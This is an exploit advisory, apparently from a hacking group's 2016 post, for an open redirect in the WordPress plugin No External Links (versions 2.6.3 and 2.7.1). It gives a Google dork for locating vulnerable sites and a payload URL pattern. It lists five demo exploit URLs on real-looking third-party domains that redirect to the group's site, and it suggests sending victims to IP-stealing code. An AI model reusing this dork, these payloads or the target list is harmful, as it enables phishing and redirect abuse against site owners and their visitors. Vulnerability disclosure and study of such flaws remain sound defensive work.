WordPress No External Links 2.6.3 / 2.7.1 Open Redirect
Posted on 14 January 2016
[^][^][^][^][^][^][^][^][^][^][^] [^] Exploit Title : Wordpress No External links Plugin Open Redirect [^] Exploit Author : Ashiyane Digital Security Team [^] Vendor Homepage : https://wordpress.org/plugins/wp-noexternallinks/ [^] Google Dork : "inurl:wp-content/plugins/wp-noexternallinks/goto.php" [^] Version : 2.7.1 & 2.6.3 [^] Date: 13 Jan 2016 [^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Vulnerable PHP File = wp-noexternallinks/goto.php [^] Vulnerable Parameter = Get Method [^] By using this vulnerability you can redirect your victim to any page you want. For example redirect somebody to a malicious php code which steals IP address. [^] [^] Attack Like : site.com/wp-content/plugins/wp-noexternallinks/goto.php?google.com [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Demos : [^] [^] http://prazhanka.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org [^] [^] http://dance-code.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org [^] [^] http://realix.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org [^] [^] http://headz.fm/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org [^] [^] http://stupnitskaya.ru/wp-content/plugins/wp-noexternallinks/goto.php?ashiyane.org [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Discovered by : Ac!D [^] tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for vendetta , Sh.Cloner & Hassan [^][^][^][^][^][^][^][^][^][^][^]